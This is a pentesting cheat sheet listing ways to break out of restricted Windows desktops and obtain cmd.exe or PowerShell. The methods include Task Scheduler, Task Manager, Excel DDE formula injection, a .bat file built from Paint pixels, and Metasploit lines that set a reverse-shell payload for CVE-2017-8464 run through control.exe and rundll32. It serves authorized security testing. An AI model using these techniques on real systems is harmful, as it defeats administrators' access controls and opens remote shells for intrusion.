Windows utilities

Windows utilities that can be used to bypass restrictions

Credit: https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/

Notepad

We can try and create a file a new text file and save at as file.bat with the content of cmd.exe , double click on the file and a cmd will open.

Cortana

McAfee uncovered and documented the security flaws in a lengthy blog post, with one simple issue being the fact that you could trigger the voice assistant from the lock screen (assuming Cortana is enabled in this respect, on default settings), and bring up a contextual Windows 10 menu simply by typing while Cortana is listening to a query.

simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below

Task Scheduler

An interesting weakness, where some systems prevent access to cmd.exe, however it can still be scheduled to run via Task Scheduler. This can be done either via the command line scheduler (at.exe) or the GUI (taskschd.msc). A basic task can be created to run cmd.exe at a specific time (i.e. 1 minute in the future) or upon certain events such as when a user logs on.

We can use it to make it run powershell from the path:

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

When a user logout and log back in

Task Manager

Task Manager: CTRL+SHIFT+ESC -> File -> Run New Task

Printer

Right-click anywhere -> Print -> Find Printer -> browse to cmd.exe

Internet Explorer

Get a cmd shell in Internet Explorer:

Address Bar

Enter in address bar:

file://C:\Windows\System32\cmd.exe

Developer Tools

Developer Tools: Press F12 -> Performance Tab -> Press on 3rd icon "Importing Profile Session"

Excel

Get a cmd.exe shell using Excel:

Place this in a cell and press enter:

=cmd|' /k cmd.exe'!'A1'

Get a cmd.exe or Powershell shell using Windows search:

press Windows key and enter search. Note that admins frequently block cmd.exe and Powershell but forget to block Powershell ISE.

Shortcuts

Try shortcuts:

Shift * 5 = 5 sticky key

Alt + F4 = shutdown computer

Win + R = run

Ctrl + Shift + esc = task manager

Ctrl + alt + delete = help menu (task manager, change password , etc)

Control Panel

Generating a simple x64 reverse shell in a .cpl format:

use windows/local/cve_2017_8464_lnk_lpe 
set payload windows/x64/shell_reverse_tcp 

Invoking the shellcode via control.exe:

control.exe .\FlashPlayerCPLApp.cpl

# or

rundll32.exe shell32.dll,Control_RunDLL file.cpl

# or

rundll32.exe shell32.dll,Control_RunDLLAsUser file.cpl

Paint

An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.

Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels

Zoom in to make the following tasks easier

Using the colour picker, set pixels values to (from left to right):

1st: R: 10, G: 0, B: 0 
2nd: R: 13, G: 10, B: 13 
3rd: R: 100, G: 109, B: 99 
4th: R: 120, G: 101, B: 46 
5th: R: 0, G: 0, B: 101 
6th: R: 0, G: 0, B: 0 

Save it as 24-bit Bitmap (*.bmp;*.dib)

Change its extension from bmp to bat and run.

Last updated